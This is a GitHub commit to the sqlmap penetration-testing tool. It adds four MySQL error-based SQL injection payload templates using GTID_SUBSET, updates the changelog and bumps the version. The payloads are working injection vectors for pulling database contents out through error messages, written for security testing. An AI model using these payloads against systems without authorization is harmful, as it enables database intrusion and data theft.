Skip to content

Commit 6b7a1df

Browse files
stamparmstamparm
committed
Adding new payload (credits: blackfan.ru)
1 parent 67f918f commit 6b7a1df

File tree

3 files changed

+84
-1
lines changed

3 files changed

+84
-1
lines changed

data/xml/payloads/error_based.xml

Lines changed: 80 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -91,6 +91,46 @@
9191
</details>
9292
</test>
9393

94+
<test>
95+
<title>MySQL &gt;= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)</title>
96+
<stype>2</stype>
97+
<level>4</level>
98+
<risk>1</risk>
99+
<clause>1,2,3,8,9</clause>
100+
<where>1</where>
101+
<vector>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
102+
<request>
103+
<payload>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
104+
</request>
105+
<response>
106+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
107+
</response>
108+
<details>
109+
<dbms>MySQL</dbms>
110+
<dbms_version>&gt;= 5.6</dbms_version>
111+
</details>
112+
</test>
113+
114+
<test>
115+
<title>MySQL &gt;= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)</title>
116+
<stype>2</stype>
117+
<level>4</level>
118+
<risk>3</risk>
119+
<clause>1,8,9</clause>
120+
<where>1</where>
121+
<vector>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
122+
<request>
123+
<payload>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
124+
</request>
125+
<response>
126+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
127+
</response>
128+
<details>
129+
<dbms>MySQL</dbms>
130+
<dbms_version>&gt;= 5.6</dbms_version>
131+
</details>
132+
</test>
133+
94134
<test>
95135
<title>MySQL &gt;= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)</title>
96136
<stype>2</stype>
@@ -886,6 +926,26 @@
886926
</details>
887927
</test>
888928

929+
<test>
930+
<title>MySQL &gt;= 5.6 error-based - Parameter replace (GTID_SUBSET)</title>
931+
<stype>2</stype>
932+
<level>5</level>
933+
<risk>1</risk>
934+
<clause>1,2,3,9</clause>
935+
<where>3</where>
936+
<vector>GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
937+
<request>
938+
<payload>GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
939+
</request>
940+
<response>
941+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
942+
</response>
943+
<details>
944+
<dbms>MySQL</dbms>
945+
<dbms_version>&gt;= 5.6</dbms_version>
946+
</details>
947+
</test>
948+
889949
<test>
890950
<title>MySQL &gt;= 5.7.8 error-based - Parameter replace (JSON_KEYS)</title>
891951
<stype>2</stype>
@@ -1155,6 +1215,26 @@
11551215
</details>
11561216
</test>
11571217

1218+
<test>
1219+
<title>MySQL &gt;= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)</title>
1220+
<stype>2</stype>
1221+
<level>5</level>
1222+
<risk>1</risk>
1223+
<clause>2,3</clause>
1224+
<where>1</where>
1225+
<vector>,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
1226+
<request>
1227+
<payload>,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
1228+
</request>
1229+
<response>
1230+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1231+
</response>
1232+
<details>
1233+
<dbms>MySQL</dbms>
1234+
<dbms_version>&gt;= 5.6</dbms_version>
1235+
</details>
1236+
</test>
1237+
11581238
<test>
11591239
<title>MySQL &gt;= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)</title>
11601240
<stype>2</stype>

doc/CHANGELOG.md

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -6,14 +6,17 @@
66
# Version 1.3 (2019-01-05)
77

88
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)
9+
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1)
910

1011
# Version 1.2 (2018-01-08)
1112

1213
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)
14+
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1)
1315

1416
# Version 1.1 (2017-04-07)
1517

1618
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)
19+
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1)
1720

1821
# Version 1.0 (2016-02-27)
1922

lib/core/settings.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@
1818
from thirdparty.six import unichr as _unichr
1919

2020
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
21-
VERSION = "1.4.7.4"
21+
VERSION = "1.4.7.5"
2222
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
2323
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
2424
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

0 commit comments

Comments
 (0)